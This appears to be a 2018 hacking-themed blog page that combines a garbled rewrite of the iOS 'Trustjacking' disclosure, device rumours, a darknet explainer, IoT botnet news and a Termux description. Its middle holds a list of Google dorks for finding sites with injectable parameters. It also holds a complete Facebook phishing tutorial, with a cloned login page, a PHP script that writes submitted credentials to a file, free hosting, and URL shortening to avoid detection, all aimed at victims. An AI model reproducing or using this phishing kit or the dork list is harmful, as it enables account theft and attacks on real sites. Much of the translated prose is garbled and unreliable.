Saturday 21 April 2018

iOS Trustjacking – A Risky New iOS Vulnerability 2018 [iphone hack]

Image result for IPHONE HACK

The worst nightmare for iPhone users is to force someone to control their devices, including the ability to record and monitor all activities, even without the same room. In this blog post, we propose a new vulnerability named "Trustjacking" that allows an attacker to do this.


This vulnerability uses an iOS feature called iTunes Wi-Fi Sync, which allows users to manage their iOS device without physically connecting to a computer. Once the iOS device owner is connected to the same network, the attacker can continue to control the device. In addition, we will pass through relevant vulnerabilities and show Apple's changes to mitigate these vulnerabilities, and why this is not enough to prevent such attacks.


Repeat related past vulnerabilities/attacks
In the past, we have seen several publications discussing the use of unauthorized USB connections to obtain personal information from mobile devices.
Prior to iOS 7, connecting an iOS device to a new computer did not require the device owner's authorization. Juice jacking. Use this behavior to steal confidential information from the device and install malicious software on the victim device. Apple solves this problem by adding a pop-up window that requires the user to authorize the new computer before allowing any synchronization.
Another publication discusses Videojacking, which uses the functionality of the Apple Connector as an HDMI connection and receives a screen recording of the iOS device when connected to a malicious charger.
Both of these attacks allow the attacker to obtain confidential information, but its main limitation is that it is only possible if the device is physically connected to a rogue device - a separate device can prevent the attack.
Trustjacking allows an attacker to gain more consistent and permanent access to the device and maintain the same functionality before the device disconnects from the rogue device. To understand how it works, we first need to explain the synchronization of iTunes Wi-Fi.


What is the iTunes Wi-Fi sync?

iTunes Wi-Fi Sync is a very useful feature that allows you to sync your iOS device with iTunes without physically connecting your iOS device to your computer.

To enable this feature, you must first sync your iOS device with iTunes by using a cable to connect to your computer and then turn on the sync option via Wi-Fi and iOS devices.


wifi sync 

HOW DOES TRUST-JACKING WORK?
 
When connecting iOS devices to a new computer, users will ask them if they trust the connected computer. Choosing trust in the computer allows him to communicate with iOS devices via the standard iTunes API.

This allows the computer to access photos on the device, perform backups, install applications, etc. without requiring additional confirmation by the user and without any obvious instructions. It also allows you to activate the iTunes Wi-Fi Sync feature so that you can continue to disconnect from your device even if your computer and iOS device are connected to the same network. Interestingly, the inclusion of "iTunes Wi-Fi Sync" does not require the victim's permission and can only be performed by the computer.

By repeatedly asking for screenshots and displaying or remotely recording, you can easily receive the device's real-time screen.

It should be noted that in addition to allowing the initial single point of failure of a malicious computer, there is no other mechanism to prevent the continuation of the visit. In addition, nothing can notify the user by allowing the computer to allow access to their devices even after disconnecting the USB cable.
 


FOR EXAMPLE

Imagine the following scenario: The victim connects his mobile phone to the airport's free charger; When the phone is connected to the charger, a pop-up message appears on the device asking him to approve the connected device. The approval of this request seems reasonable: the victim wants to charge his device, the service seems to be legal, and it seems that no suspicious events occurred after the approval.
 


From the user's point of view, all he has to do is connect his device to a malicious charger/computer (it can also be his own computer, as described below) and choose to trust him.

 

When reading text, the user is assured that the device is only connected when it is physically connected to the computer, so it is assumed that disconnecting will block access to his personal data. Even if the device is only connected for a short period of time, an attacker can take the necessary steps to ensure that all operations performed on the device are visible after it is closed.


The attacker needs to take two steps:
  • Allow the device to connect to iTunes
  • Enable iTunes Wi-Fi sync
These actions can be performed automatically with the help of malware. They are very interesting and do not require any additional permission from the victim, nor do they show any signs on the device. Something will happen. Once these steps are completed, the device no longer needs to physically connect to the attack device. Now, if the victim and the attacker are connected to the same network, the attacker can remotely control the device.

To be able to see the screen of the victim's device, the attacker needs to install an iOS version of the developer's picture that fits the victim's device; then it can take multiple screenshots and view the device's screen in real time. The installation of developer images can be done over Wi-Fi without the need to restore physical access to the device. Although restarting can remove developer images from the device, hackers can still access it and easily reinstall it.


In addition to remotely viewing the victim's device screen, Trustjacking also allows an attacker to do much more.
One of the functions that an attacker can use is a remote backup of iTunes. By creating a backup copy of the contents of the device, an attacker can gain access to a lot of personal information, such as:

     
A photo
     
SMS / iMessage chat history
     
Application data
To get this information, we had to disassemble the backup copy of iTunes.
A backup consists of several metadata files and the archives themselves. Each file is stored in the path SHA1 ("% domain% -% relativePath%") and in the directory with the name given for the first two hexadecimal digits of the hash.
For example, the picture with the track "Media / DCIM / 100APPLE / IMG_0059.JPG" will be saved in the path "b1 / b12bae0603700bdf7719c3a65b22ca2f12715d37", because "b12bae ..." is the hash of SHA1 "CameraRollDomain-Media / DCIM / 100APPLE / IMG_0059 .JPG".
All backup files are listed in the "Manifest.db" file, which is SQLite3 DB, and can be easily viewed by requesting it.
A simple query, such as:
`SELECT * FROM Files WHERE relativePath like '% Media / DCIM%' ORDER BY relativePath;` will display all the backups, including their hashes.
Reading SMS / iMessage requires parsing another SQLite3 DB, which can be found in the file "3d / 3d0d7e5fb2ce288813306e4d4636395e047a3d28" (equivalent to SHA1 "HomeDomain-Library / SMS / sms.db").
Two interesting tables are "chat", which lists all the chats and a "message" containing all the messages for these chats, with "chat_message_join" to join them.
there are more. An attacker can also use this device to access malicious applications and even replace existing applications with modified wrapper versions that look similar to the original application, but can monitor users while using the application, even using private APIs. Always monitor other activities. In the following video demonstration, we will demonstrate how they identify the application on the device and replace the application with a repackaged version. Note the number of seconds the application was deleted and reinstalled.

The attack we describe requires that the device and the attacking computer are connected to the same network. Usually this means getting close to the victim's device and connecting to the same Wi-Fi, but this is not the only option.
By combining this attack with a malicious profile attack, we can connect the device to a VPN server and establish a continuous connection between the victim's device and the attacker's computer, and use this attack at any time, and it is not subject to the proximity of the device. Limit or connect to the same network.


iOS 11 - Follow the information we disclose to Apple
Following our responsible disclosure process, Apple chose to add a mechanism to ensure that only the true owner of the iOS device can choose to trust the connected new computer. This is accomplished by requiring the user to enter his/her password when choosing to authorize and trust the computer.


It can be clearly seen from the screenshot that the user is still informed that this authorization is only useful when the device is connected to the computer, causing him to believe that disconnecting his device ensures that no one can access his private data.
Although we greatly appreciate Apple's mitigation measures, we would like to emphasize that it does not solve the Trustjacking issue in a comprehensive manner. Once the user chooses to trust the compromised computer, the remaining loopholes continue to work as described above.What happens if the attacker infects the victim's computer instead of using a malicious charger?
The limitation of the malicious collector attack process is that the victim and the iOS device may have a shorter time in the same proximity/network as the malicious computer. If the user's own computer becomes a malicious act, it will be more destructive. This powerful Trustjacking use case can occur when the device owner's own PC or Mac is attacked by malware. In this case, the attacker can exploit the fact that the victim has a trust relationship between his iOS device and his computer, as well as the fact that his computer is usually implemented close to a mobile phone (such as a home, office, etc.) to not only gain insight into the infected computer. On the operation, but also in-depth understanding of the victim's mobile phone activities.


Remediation
Unfortunately, there is no way to list all trusted computers and selectively withdraw access. The best way to ensure that your iOS device does not trust your computer is to clear the list of trusted computers by going to Settings> General> Reset> Reset Location and Privacy, then you need to re-authorize all previously connected computers you need to have your iOS The device is connected to each device.
To protect device backups and prevent attackers from using Trustjacking to obtain additional private information, enable encrypted backups in iTunes and select a strong password.





 

Installing a mobile threat protection solution, such as SEP Mobile or Norton Mobile Security, will help protect your device from the other effects of such attacks. SEP Mobile will identify and protect end users from malicious personal data, install applications or attempt to disrupt devices through this technology, and utilize integration with the SEP product line to enable customers to fully understand mobile and desktop operating systems.
For application developers - Avoid including sensitive data in iTunes backups as this will reduce the risk of attackers using Trustjacking to gain access to this application by accessing backups of the application.


Acknowledgements
We would like to thank Apple's security team, thank them for their cooperation, and continue to commit to the security of Apple's user base.
 
 

   

iPhone SE 2 may be release to market without a headphone jack

iPhone SE



According to a new report today, iPhone SE 2 will be released next month, but don't expect to find a headset jack on this device.


Makotakar said that the most convincing evidence shows that the 4 inch iPhone was updated before or during Apple's WWDC 2018 label on June 4th. It is said that its specifications comply with iPhone 7, including the A10 Fusion chipset.

This confirms the new regulatory document issued this week, which shows that time is less than two months away today, and there are eleven different options in the pipeline (possibly with internal and stored color differences).


ON THE WAY, HEADPHONE JACK

For those who think the iPhone X is too big, the new user-friendly iPhone with its original iPhone SE size (based on the design of the iPhone 5 and 5S) is very attractive. The entry-level SE2 price will also be a big incentive.

In spite of this, if you do not have a 3.5 mm headphone jack, updates may have to get used to life. No one has ever said that "courage" is easy. The report said that Apple is equipped with an audio connector in the iPhone SE 2, which makes a lot of sense. Of course, the company wants you to buy its true wireless AirPods.

It is not yet possible to determine if Apple's Apple headset jack will help the iPhone SE 2's waterproof function. The new features of iPhone 8, 8 Plus and iPhone X are unlikely because it requires glass.

iPhone SE 2 is ready to become the first smartphone of Apple's next level, but it is not the only choice in 2018. The iPhone X2, iPhone X2 Plus and 6.1-inch iPhone 9 LCD screens are expected to make their debut in the normal September time.


I JUST CANT WAIT FR THE RELEASE OF iPHONE SE2 

I think the portability is what i'm craving on and new features or what do you think?   

Wednesday 18 April 2018

NEW GMAIL DESIGN TO BE LAUCH IN FEW DAYS



Image result for NEW GMAIL DESIGN


Google does not show exactly what the new design looks like for Gmail, but recently the company launched a new design for Google Calendar. The calendar was updated with modern icons, colors and clear pictures. In general, the design seemed much more than a mobile application, and it is reasonable to assume that Gmail will be updated in a similar way. Google radically redesigned Gmail for its own Inbox application in 2014, but the company has adhered to the original Gmail design so far for its web version.
The redesign of Google Gmail will be available in the coming weeks as an early access program for G Suite customers and personal Gmail accounts. Google is looking to test the main Chrome extensions to ensure that the new Gmail interface is compatible before it is widely available.
Google confirmed that the new Gmail is on the way in the Verge statement. "We are working on some important updates for Gmail (they are still in development)," said the Google representative. "We need a little more time to write to us, so we can not share anything, file it now, and we'll let you know when it's time to send a message."


let's anticipate for new design!

  Drop your opinion on new design which google is about to launch in the comment box below!!!

GOOGLE DORK FOR CROSS SITE SCRIPTING [XSS VUNLERABILITY] 2018:

A Google query (sometimes called a dork) is a search string that uses advanced search operators to find information that is not readily available on the web site. Google Dorking, also known as Google hacking, returns are difficult to find information through simple searches

Image result for google dork

This are following xss dork list for 2018:
and you can download it from here DOWNLOAD NOW


1 /2wayvideochat/index.php?r=
2 /elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
3 /gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
4 /hexjector.php?site= /hexjector.php?site=
5 /index.php?option=com_easygb&Itemid=
6 /index.php?view=help&faq=1&ref=
7 /index.php?view=help&faq=1&ref=
8 /info.asp?page=fullstory&key=1&news_type=news&onvan=
9 /info.asp?page=fullstory&key=1&news_type=news&onvan=
10 /main.php?sid= /main.php?sid=
11 /news.php?id= /news.php?id=
12 /notice.php?msg= /notice.php?msg=
13 /preaspjobboard//Employee/emp_login.asp?msg1=
14 /Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
15 /schoolmv2/html/studentmain.php?session=
16 /search.php?search_keywords= /search.php?search_keywords=
17 /ser/parohija.php?id= /ser/parohija.php?id=
18 /showproperty.php?id= /showproperty.php?id=
19 /site_search.php?sfunction= /site_search.php?sfunction=
20 /strane/pas.php?id= /strane/pas.php?id=
21 /vehicle/buy_do_search/?order_direction=
22 /view.php?PID= /view.php?PID=
23 /winners.php?year=2008&type= /winners.php?year=2008&type=
24 /winners.php?year=2008&type= /winners.php?year=2008&type=
25 index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations”
26 index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations”
27 intext:”Website by Mile High Creative”
28 inurl:”.php?author=”
29 inurl:”.php?cat=”
30 inurl:”.php?cmd=”
31 inurl:”.php?feedback=”
32 inurl:”.php?file=”
33 inurl:”.php?from=”
34 inurl:”.php?keyword=”
35 inurl:”.php?mail=”
36 inurl:”.php?max=”
37 inurl:”.php?pass=”
38 inurl:”.php?pass=”
39 inurl:”.php?q=”
40 inurl:”.php?query=”
41 inurl:”.php?search=”
42 inurl:”.php?searchstring=”
43 inurl:”.php?searchst­ring=”
44 inurl:”.php?tag=”
45 inurl:”.php?txt=”
46 inurl:”.php?vote=”
47 inurl:”.php?years=”
48 inurl:”.php?z=”
49 inurl:”contentPage.php?id=”
50 inurl:”displayResource.php?id=”
51 inurl:.com/search.asp
52 inurl:/poll/default.asp?catid=
53 inurl:/products/classified/headersearch.php?sid=
54 inurl:/products/orkutclone/scrapbook.php?id=
55 inurl:/search_results.php?search=
56 inurl:/­search_results.php?se­arch=
57 inurl:/search_results.php?search=Search&k=
58 inurl:/search_results.php?search=Search&k=
59 inurl:”contentPage.php?id=”
60 inurl:”displayResource.php?id=”
61 inurl:com_feedpostold/feedpost.php?url=
62 inurl:headersearch.php?sid=
63 inurl:scrapbook.php?id=
64 inurl:search.php?q=
65 pages/match_report.php?mid= pages/match_report.php?mid=

HOW TO HACK FACEBOOK ?[LATEST TRICK MARCH 2018].

Hack Facebook Using Phishing

Follow The Given Steps (by these you can also hack Gmail, Yahoo, or any other account)

Step 1

To hack facebook using phishing, first of all, go to the Facebook and then right-click on the blank area, you will see the option view source page simply click on that.

Step 2

Now a tab will open which will contain source code of Facebook login page.

Step 3 

select all code and copy all code then paste it into notepad.

Step 4

When source code is pasted in notepad after that press Ctrl+F and type action in notepad.

Step 5 

you will have to search again and again till you have found a text which looks like
action=”https://www.facebook.com/login.php?login_attempt=1&lwv=111


Step 6 

After that delete all the text written in green and instead of write it Post.php. After that, it will look like action=”post.php”


Step 7. Save it on your desktop or in any hard drive storage with the name index.htm and yes remember not as index.html as many times people save it as index.html.


you have completely made your phishing page which will look like as given in the pic below
 

Step 8 

Now you need to create a php file for this Open a new notepad and copy the code given below and save it with the name post.php.
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
you have successfully created two files 1. index.htm and 2. post.php

Step 9 

You need to upload these two files in a free web hosting site. some best webhosting site which are useful for you. you need to make a account on any of one below web hosting site.
  1. www.my3gb.com
  2. Hostinger
  3. www.000webhost.com
  4. Freehosting
I prefer www.000webhost.com
IMG_20160523_183454

Step 10 

Now you have to sign up simply fill all required information in the registration form. When your account completely setup simply log in with your username and password.
IMG_20160523_185135

Step 11 

Open Cpanel (control panel) then click on file manager, after that a new window will pop up. Now go to public_html.
Untitled 2

Step 12 

Delete the file named default.php after that you need to upload index.htm and post.php file click on upload files button and upload both files one by one. Now click on index.htm which will look like same as that of the original Facebook page. this is your phishing page.
hackchefs.com
Step 13. Copy URL of that page and send this link to victim on Facebook , Gmail , or wherever you want, when victim open that link he sees fake Facebook page which looks like  real and enters their username and password and hit log in his password, the page redirects connect to facebook and you will able to see his/her password by going into account  000webhost.com and go to file manager and then public_html here you will find a new file as username.txt. Before sending this link to anyone shorten its URL first which may help you to undetected by Facebook. You have successfully hack Facebook using Phishing.



phishing is a criminal offense and illegal activity so don’t try to anyone. This tutorial is for educational purpose

Monday 23 October 2017

What is Deepnet or Darknet?

Image result for darknet


Many people keep on asking me "What is Deepnet or Darknet?"


Therefore, the normal search engine can not access the site formed Deepnet. This includes sites where its robots.txt is set to prevent Google and other search engines from indexing them on the Internet in order to exclude them from the search. They can be private personal website, intranet and so on.

However, Darknet (the term is often used interchangeably with Deepnet) is not just an index for preventing search engines. Darknet on the site is anonymous, that you can not know who the site is, access to such a Darknet site when the owner. Unlisted site owners can still be traced back to who purchased the domain name and so on. Sites in Darknet are sites that use the Tor (The Onion Router) network. The basis of the Tor network is to include so many nodes where the origin can not track where the data is coming or from.

Ordinary browsers can not open the top domain name for .onion's Darknet site because they are not normal domain names, but a string of random characters followed by .onion. These domain names are created by onions when you use an onions or Tor network hosting anonymous sites. So if you try to access a Web site in Darknet, the DNS server does not have any clues to the content, and you will receive an error that the site has not found. Only the onion server knows how to fix these domain names.

Darknet is part of the Internet that hosts anonymous sites that may or may not provide legal content.

You will need a Tor browser to view these sites. Read our comments on the TOR browser to learn more about the onion router and how it works.

Who uses Darknet or Deepnet? Is it dangerous?
This may be as simple as a group of friends who are discussing serious problems, or as dangerous as an assailant's service. May be the journalists who want to work, the possibility of being sentenced to imprisonment, or who may be drug traffickers and weeds. If there is no fear of being caught, the informant who exports the information has this information, and there is also a child pornography on the website.

Most of the underworld was abused by criminals. This is because it provides almost complete anonymity. Where they sell services such as paying for murder (assassin service), all types of pornography, prostitutes, drug traffickers, weed sellers. That's why Darknet is considered dangerous.

Often some links will not tell you where they are leading unless you access them from a reliable Darknet directory. It is possible that you click on the link to some discussion and put it on an assassin's page. If there is any problem, the police will knock on the door.

Why the authorities can not ban Darknet?
The TOR network was originally created by an American military base and communicated anonymously. They are still reproduced in the underworld government files, rather than open to the public. There are anonymous intranet to store these files, and those who have the password can access these files. Since the federal government and other governments themselves are using Darknet, they do not think that the TOR will be shut down.

This is a free hand for criminals, journalists, informants, etc. They can create and host anonymous sites that only provide anything but can not search from the surface network (or the normal network - possibly the site is not indexed), nor can the mainstream browser open these sites because they do not depend on the traditional DNS server The All Darknet / Deepnet has a .onion domain, accessible only through the TOR browser, and some projects can use the TOR network. But the easiest way to get into Darknet is the TOR browser.

Dear friends, kindly give your opinion or experience if you have ever surf deep web or black-market..
NOTE: please there should be restriction of word due to some kids and immature being.

ALERT!!!: New fast IOT botnet threat to break the internet

BOTNET TARGETING COMPUTER

Just a year after the biggest IoT-based malware in the future, a huge Internet crash was launched by launching a massive DDoS attack - a year ahead, security researchers are warning a new fast growing IoT botnet.
Researchers first discovered "IoT_reaper" by the odd tiger 360 company in September, and the new malware no longer relied on cracked passwords; instead, it exploited vulnerabilities in various IoT devices and swallowed them into botnets.

IoT_reaper Malware currently includes the following nine previously disclosed vulnerabilities in the IoT device vulnerability of the following manufacturers:


  1. Dlink (router)
  2. Netgear (router)
  3. Linksys (router)
  4. Goral (camera)
  5. JAWS (camera)
  6. AVTECH (camera)
  7. Vacron (NVR)

Researchers believe that IoT_reaper malware has infected nearly 200 million devices and has grown 10,000 new devices at an extraordinary rate every day.

This is very worrying, because last year the use of large-scale DDoS attacks Mirai removed the DNS provider Dyn, only 10 million infected devices.
In addition, the researchers pointed out that malware also includes more than 100 DNS resolvers, enabling it to start DNS amplification attacks.

"Currently, this botnet is still in its early stages of expansion. But the author is actively modifying the code, which deserves our vigilance." Qihoo 360 researchers say.

At the same time, CheckPoint researchers have warned that the same IoT botnet, called "IoTroop", has been infected with hundreds of thousands of organizations.

"It is too early to guess the intentions of the threat actors behind it, but with previous Botnet DDoS attacks essentially taking down the Internet, it is vital that organisations make proper preparations and defence mechanisms are put in place before attack strikes." researchers said.

According to CheckPoint, IoTroop malware also exploited vulnerabilities in wireless network camera devices such as GoAhead, D-Link, TP-Link, AVTECH, Linksys, Synology.

At this time, do not know who created this, why, but DDoS threat pattern is soaring, and may reach tens of megabytes of size.
"Our research suggests we are now experiencing the calm before an even more powerful storm. The next cyber hurricane is about to come." CheckPoint researchers warned.

You need to be more vigilant about the security of your smart devices. In our previous article, we have provided some essential, somewhat practical, solutions to protect your IoT
devices.
SOURCE: https://thehackernews.com/2017/10/iot-botnet-malware-attack.html

Termux: The android terminal emulatior


Termux is an Android terminal emulator and Linux environment application that works directly without taking root or setting up. Automatically install the smallest base system - you can use the APT package manager to provide additional packages.

Termux is also a terminal emulator is a program that makes your Android phone like an old computer terminal. It is useful for accessing the built-in Linux command line shell for each Android phone. This allows you to run various Linux command line utiliti

USES OF TERMUX APP!!

Secure Access. Use OpenSSH's ssh client to access the remote server. Termux combines standard packages with precise terminal emulation in a beautiful open source solution.

Feature packed are selected between Bash, Fish or Zsh and nano, Emacs or Vim. Through your SMS inbox. Access the API endpoint and use rsync to store a backup of the contact list on the remote server.

Customizable. By installing the APT package management system from Debian and Ubuntu GNU / Linux you want to install. Why not start with Git and sync your dotfiles?


Explorable. Are you sitting on the bus and want to know which parameters tar accepts? The packages provided in Termux are the same as the packages on Mac and Linux - install the man pages on your phone and read them in a conversation and experiment in another session.


Related Posts Plugin for WordPress, Blogger...